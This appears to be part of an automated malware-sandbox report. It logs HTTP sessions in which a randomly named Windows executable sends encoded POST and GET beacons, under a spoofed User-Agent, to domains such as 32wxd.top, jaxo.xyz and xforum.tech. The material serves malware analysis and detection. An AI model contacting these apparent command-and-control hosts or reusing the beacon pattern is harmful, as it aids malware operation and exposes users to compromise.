                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.6 | 49736 | 206.119.82.116 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:55.311536074 CEST | 1782 | OUT | POST /kyiu/ HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.32wxd.top
                      Referer: http://www.32wxd.top/kyiu/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 58 4e 6a 4e 39 4d 66 2b 73 55 65 55 55 38 42 4c 70 2f 4d 54 44 6d 73 73 58 42 44 65 68 2f 56 57 47 64 50 74 46 49 6f 4c 39 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 75 61 6b 38 59 74 37 36 4d 67 67 6f 5a 76 4c 73 50 62 4d 70 4c 63 6e 4f 53 74 39 36 4f 4a 6c 41 75 76 41 49 41 4d 77 59 4f 78 67 47 4b 35 56 46 36 66 62 6a 37 43 6f 37 76 4b 78 6a 35 44 53 36 51 77 4f 4b 54 57 61 45 70 65 4f 58 79 7a 67 54 53 [TRUNCATED]
                      Data Ascii: Xn70_= [TRUNCATED]
                      Aug 23, 2024 08:26:56.196719885 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:56 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      16 | 192.168.2.6 | 49737 | 206.119.82.116 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:26:57.854135990 CEST | 500 | OUT | GET /kyiu/?Xn70_=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.32wxd.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:58.733803034 CEST | 691 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:58 GMT
                      Content-Type: text/html
                      Content-Length: 548
                      Connection: close
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      17 | 192.168.2.6 | 49738 | 66.29.149.180 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:03.822593927 CEST | 742 | OUT | POST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrWYJc3zVMENMivJiTHLTYgivqVa8220CrByey6waeZ/r
                      Aug 23, 2024 08:27:04.427825928 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:04 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      18 | 192.168.2.6 | 49739 | 66.29.149.180 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:06.372579098 CEST | 766 | OUT | POST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwCtqXCO2W0opBKegt89RtaITqwb+aw3s5un3xbB9CDcKg==
                      Aug 23, 2024 08:27:06.956264973 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:06 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      19 | 192.168.2.6 | 49740 | 66.29.149.180 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:08.922291040 CEST | 1779 | OUT | POST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QF3RXB+cpXyq1gpamjWZmeUgR8eaUvgv+cJGkKeSp0Te/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcdhPrpaBCTjFC9nHEbGmGgyLE4CzIJKIMyt8my8iTnz9ppRchw1qazghyfJyUAoSqFxMx8n7IFN4rvJtNZdbuc4SWsjornsUdAfcSLJ5sA0WSJ3JZwmFWiq6+be35XV4ld12R3ubZHYMMD0/F6EB+2hW0Mhm4HN/Up43aR5+NFlNJULOYpWAGxZGp9IRFFEEmGCAJjCJ6MO22BGi9xii8q7M/+ENounBq+a2OaAOL3RgYRRvLlv9EzdE1O6bTbnIrMxpvTO6T7z8NnIAPucVxIKW5aX2YxVypA8yNXp9Wt8ilfGb1DBFUZN4PM/WZC+2rosto4Trs1c1Nn/u1C/fI78nY7iNY40A1W1CUuPMWyG1QIPtVwDMIxfWwi3tyXrYbDssWqCWBw41kbPL+KeY2Mc4Q9C8ap8FYMUdl7Wua5p06f6aUuYT8M1uHkAmzifsu++lbmcfMoGE4KFiKnujLaRvUShbkRugDxmdtUrolHnCCCc9IlHiNsTqe4PGoHrqglUNDf3V8fXZYcHtI50A/ox4X7VUZr6U9U12rmqIM0JeqIP9Iq+unTKLudZXIkEA89ZkqC3DCa44AaQ2Sq1pnhhYzhYPEVC3alPelxSXqOy04f9AAs3aMi4a3DgL/bpnY94ppBqfkgKD3Nv0ZRyOFaQSdi3d1sd01Hph4XAWca9y0fKh9gI1bc/NN5fxvrdVt9sTWaWctiOpr2AozjGj7P7RcEShF0V9jNtsCdXTP3U5VbzoDzJn0 [TRUNCATED]
                      Aug 23, 2024 08:27:09.524092913 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:09 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                      Aug 23, 2024 08:27:09.524379015 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                      Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
                      Aug 23, 2024 08:27:09.529269934 CEST1236INData Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
                      Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      20 | 192.168.2.6 | 49741 | 66.29.149.180 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:11.462482929 CEST | 499 | OUT | GET /f9bc/?Xn70_=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:12.252274036 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:11 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      21 | 192.168.2.6 | 49742 | 103.224.182.242 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:17.762106895 CEST | 751 | OUT | POST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlJyDpv4KmCfqeb8/mhckPe0ozYxhS3pOTtdyVsEKYCvJ
                      Aug 23, 2024 08:27:18.331600904 CEST | 872 | IN | HTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:18 GMT
                      server: Apache
                      set-cookie: __tad=1724394438.1131553; expires=Mon, 21-Aug-2034 06:27:18 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.6 | 49743 | 103.224.182.242 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:20.315664053 CEST | 775 | OUT | POST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Ascii: Xn70_=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOUqzapTSXpkRtlyH7ItX2KqpYVWbbglnVWhXuYUUJC9dg==
                      Aug 23, 2024 08:27:20.896748066 CEST | 872 | IN | HTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:20 GMT
                      server: Apache
                      set-cookie: __tad=1724394440.4608183; expires=Mon, 21-Aug-2034 06:27:20 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.6 | 49745 | 103.224.182.242 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:22.857660055 CEST | 1788 | OUT | POST /647x/ HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.xforum.tech
                      Referer: http://www.xforum.tech/647x/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:23.463891029 CEST | 872 | IN | HTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:23 GMT
                      server: Apache
                      set-cookie: __tad=1724394443.6196117; expires=Mon, 21-Aug-2034 06:27:23 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-encoding: gzip
                      content-length: 577
                      content-type: text/html; charset=UTF-8
                      connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.6 | 49746 | 103.224.182.242 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:25.400645971 CEST | 502 | OUT | GET /647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw= HTTP/1.1
                      Host: www.xforum.tech
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:26.008981943 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Fri, 23 Aug 2024 06:27:25 GMT
                      server: Apache
                      set-cookie: __tad=1724394445.3736214; expires=Mon, 21-Aug-2034 06:27:25 GMT; Max-Age=315360000
                      vary: Accept-Encoding
                      content-length: 1539
                      content-type: text/html; charset=UTF-8
                      connection: close
                      Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body
                      Data Ascii: bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652o


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.6 | 49747 | 18.183.3.45 | 80 | 6008 | C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Aug 23, 2024 08:27:31.735064983 CEST | 772 | OUT | POST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
